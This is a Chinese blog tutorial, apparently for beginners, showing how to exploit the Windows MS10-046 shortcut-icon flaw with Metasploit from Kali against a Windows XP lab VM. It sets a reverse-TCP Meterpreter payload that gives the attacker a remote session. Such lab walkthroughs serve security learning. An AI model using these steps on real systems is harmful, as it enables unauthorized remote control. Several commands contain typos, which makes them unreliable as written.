网络安全与网站安全及计算机安全:如何利用Kali Linux的MSF进行MS10-046安全演练

最新推荐文章于 2024-08-30 11:37:01 发布
最新推荐文章于 2024-08-30 11:37:01 发布
阅读量304 收藏 1
点赞数
分类专栏: 网络安全 kali 科技 文章标签: web安全 kali 运维 安全 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiao1234oaix/article/details/121877180
版权
科技 同时被 3 个专栏收录
188 篇文章 10 订阅
订阅专栏
kali
27 篇文章 9 订阅
订阅专栏
网络安全
20 篇文章 3 订阅
订阅专栏
本文介绍了如何使用KaliLinux中的Metasploit Framework(MSF)对WindowsXP系统进行渗透测试。首先,启动MSF并搜索漏洞ms10-046,然后配置payload为windows/meterpreter/revers_tcp,设置靶机和本机IP。运行payload后,通过session命令查看和管理会话,实现对靶机的控制。这是一个针对网络安全和渗透测试的学习教程。
摘要由CSDN通过智能技术生成

一、资源装备

  1. 安装好Kali Linux的虚拟机一台;
  2. Windows xp 计算机一台。
  3. 整装待发的小白一个。

二、复现步骤
2.1 在kali中启动MSF。
打开终端 键入命令:msfconsole

在这里插入图片描述

​2.2 配置相关参数
①键入命令:search ms10-046
②复制msf返回的命令前加use: use exploit/windows/browser/ms10-046_shortcut_icon_dllloader
③设置payload:
set paylodad
windows/meterpreter/revers_tcp
④显示需要配置的参数 : show options

在这里插入图片描述

⑤设置靶机(win xp)IP地址 set srvhosts 192.168.xxx.xxx
⑥设置本机(kali) IP地址 set lhost 192.168.xxx.xxx
⑦运行payload键入命令:exploit

在这里插入图片描述

2.3 查看接收到的会话,并对靶机实行测试
键入命令:session -i,查看会话。session -i x(x为会话id)连接会话。

在这里插入图片描述

关注我,私信我,与我一对一学习与交流!

Kali与编程~
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
2024年网络安全最全VMware Tools本地提权漏洞CVE-2024-31676分析与复现(1)
2401_84263434的博客
05-01 88
LsaLogonUser函数能够在不需要计算机账号密码的情况下,登录指定账号,登录成功后返回该账号的令牌(token),当然调用该函数的程序需要SeTcbPrivilege权限,该服务程序也拥有此权限。这似乎和提权漏洞密切相关,如果能够控制登录的账号,用管理员的账号登录,再创建指定进程,那么创建的进程将拥有管理员权限。遗憾的是,该程序里并没有创建进程相关的函数调用。
网络安全最新冗余系统研究:智能汽车的最后安全防线_博世dpb与iboster区别
2401_84247617的博客
05-04 693
1.4.5 EMB发展的难点1.5.1 电动助力转向向线控转向发展1.5.2 SBW冗余设计1.7.1 车载以太网将成为骨干网络1.7.2 基于以太网的冗余设计1.9.1 目前有远程接管技术的公司汇总1.10.1 车路协同产业链1.10.2 车路协同发展情况**国外供应商冗余系统汇总**2.1.1 公司简介2.1.2 经营状况2.1.3 博世整体冗余设计2.1.4 博世感知模块冗余设计2.1.5 博世定位模块冗余设计2.1.6 博世决策模块冗余设计。
kali攻防第11章 攻击实例讲解-ms10_046快捷方式图标漏洞
安全参透之旅
12-18 3487
攻击实例讲解-ms10_046快捷方式图标漏洞   准备工具 1、kali系统 IP:10.10.10.131 2、受害者机子 IP:10.10.10.129 3、使用工具 msfconsole   步骤: 1、进入控制台 root@kali:~# msfconsole                                                      
ms10-046漏洞利用+bypassuac提权
m0_62008601的博客
11-24 1110
记一次ms10-046漏洞复现过程+bypassuac提权过程
Kali利用msfMS10_061漏洞进行渗透测试
qq_50854662的博客
05-29 2023
注意事项: kail首次打开metasploit,会初始化数据,可能会有点慢,请耐心等待!本文仅供学习漏洞渗透测试,不得用于其他非法用途,否则造成的任何后果自负!!! 1. Metasploit简介 Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。详细介绍可以参考百度百科对 Mettasploit 的介绍。 2.打印后.
MS10_046漏洞利用
彼岸花苏陌的博客
12-04 657
如果显示特制的快捷方式图标,则该漏洞可能允许远程执行代码。 成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。 那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。 ...
MS10_046_shortcut_icon_dllloader漏洞复现
m0_48907714的博客
03-11 5402
MS10_046漏洞复现 漏洞介绍:Windows Shell 中一个公开披露的漏洞。 如果显示特制的快捷方式图标,则该漏洞可能允许远程执行代码。 成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。 00x01实验环境 两台虚拟机,一台为kali ip:192.168.72.4 一台为 Windows xp ip:192.168.72.6 使用的工具:msfconsole 00x02实验过程 打开两台虚拟机,打开kalimsf软件,搜索MS10_046漏洞,找到三个模块 本次复现第二个模
linux ssh7.4 升级至9.5(安全扫描漏洞处理)
cc123489ll的博客
04-24 688
漏洞处理#$ ssh -V点击进行下载点击进行下载点击[telnet-server-0.17-66.el7.x86_64.rpm “telnet-server-0.17-66.el7.x86_64.rpm”)进行下载。
网络安全最新网络安全-sqlmap学习笔记_sqlmap --no-cast
2301_82242964的博客
05-04 638
检测和利用SQL注入的工具。sqlmap官网sqlmapWiki本文参考用户手册,有删减,算是低创,但并非完全翻译,有包含自己的抓包及部分使用sqlmap注入的内容,sqlmap实战在文末链接。--prefix和--suffix在某些情况下,仅当用户提供要添加到注入有效负载的特定后缀时,漏洞参数才可利用。当用户已经知道查询语法并想通过直接提供注入有效载荷前缀和后缀来检测和利用SQL注入时,这些选项很方便出现的另一种情况就会出现。为了检测和利用此SQL注入,您可以让sqlmap 在检测阶段为您检测边界。
ISO21434道路车辆网络安全-9(1)
2401_84253380的博客
04-28 1110
另外,相关项定义也要考虑相关项的约束条件和相关网络安全标准的信息。对于平台件的开发,因脱离环境背景,本活动也可以用假设的方式进行。**、网络安全目标**活动目的:明确网络安全目标和网络安全声明活动输入:相关项定义,持续性网络安全活动的网络安全事件也可用于更新TARA活动输出:TARA分析报告(包括网络安全目标和网络安全声明),评审报告活动要求:基于相关项定义,利用第15章的方法,完整进行威胁分析和风险评估,如果相关项定义没有提供足够的信息,可以进一步假设。
ms08_067,ms10_046漏洞复现与利用
kunkun_xiaomeng的博客
09-07 1502
ms08_067,ms10_046
渗透测试-[windows-MS08-067、MS10-046、MS17-010、MS12-020]
m0_43405474的博客
05-05 3075
【MS漏洞攻击实验-MS08-067、MS10-046、MS17-010、MS-12-020】0.实验环境1.MS08-067【RPC】1.1 漏洞描述1.2 主机发现1.3 利用MSF通过ms08-067漏洞渗透目标系统1.4 后渗透利用1.查看权限:2.Shell3.添加账号4.将新账号添加到管理员组中5.截屏2.MS10-046【快捷方式自动执行代码】2.1 漏洞描述2.2 渗透攻击2.3 后渗透利用3.MS17-010【SMB】3.1 漏洞描述3.2 渗透攻击3.2.1 目标发现3.2.2 渗透攻击
MSF中sessions命令使用
qq_44624916的博客
11-28 5562
MSF使用
【无标题】ms10_046复现
m0_73853543的博客
07-01 112
ms10-046 快捷方式漏洞
最新发布
m0_65809311的博客
08-30 1062
震网”事件就曾利用了这一漏洞,通过相关合作供应商使用U盘,感染了伊朗核工业某一主机。
微软MS10-046漏洞的利用
qq_50854662的博客
05-26 846
微软MS10-046漏洞的利用 0x00 前言0x01 环境1. 目标机环境2. 攻击机环境3. 拓扑结构 0x02 过程1. 相互ping通2. 启动Metasploit3. 查找和MS10-046相关的模块4. 加载模块5. 设置所使用的payload6. 设置文件共享服务器的地址,应为BackTrack虚拟机的地址7. 设置目标主机被控制后反弹的地址,应为BackTrack虚拟机的地址8. exploit9. 查看会话10. 进入交互模式11. 拿到shell 0x00 前言 这是我
渗透测试 ( 4 ) --- Meterpreter 命令详解
freeking101的博客
07-02 8955
Meterpreter 是 Metasploit 框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell 的链接。Meterpreter shell 作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开 shell、得到用户密码、上传下载远程主机的文件、运行 cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络.
Kali Linux渗透测试进阶提升及其实战教程
11-07
一、课程声明       本课程所有分享仅做学习交流,切勿用于任何不法用途,请每位学员自觉遵守网络安全法等法律法规!二、课程概要      本课程主要分享Kali Linux渗透测试进阶实战技巧!三、适合人员       1、零基础大学生       2、IT技术人员       3、运维工程师       4、渗透测试工程师       5、漏洞挖掘工程师四、特别说明       1、本课程支持一次购买,永久观看!       2、本课系讲师原创课程,请勿盗用!
Kali Linux渗透测试全程课与脚本语言编程系列课程
09-29
一、课程概要         本课程主要分享分享Kali Linux渗透测试全程课与脚本语言编程系列课程! 二、课程目标          本课程致力于帮助广大学员掌握Kali Linux渗透测试与编程技巧! 三、适合人员         本课程适合兴趣计算机网络安全技术的学员观看学习! 四、特别提醒         本课程支持一次购买,享受永久观看,欢迎大家选购!
Kali Linux最新VM版:网络安全渗透测试利器
在下载完成后,按照常规的虚拟机安装步骤,设置好所需的网络和存储选项,即可启动并开始在Kali环境中进行网络安全实验和实战演练Kali Linux的最新VM版本为安全专业人员和学习者提供了功能齐全、易于使用的平台,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Kali与编程~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值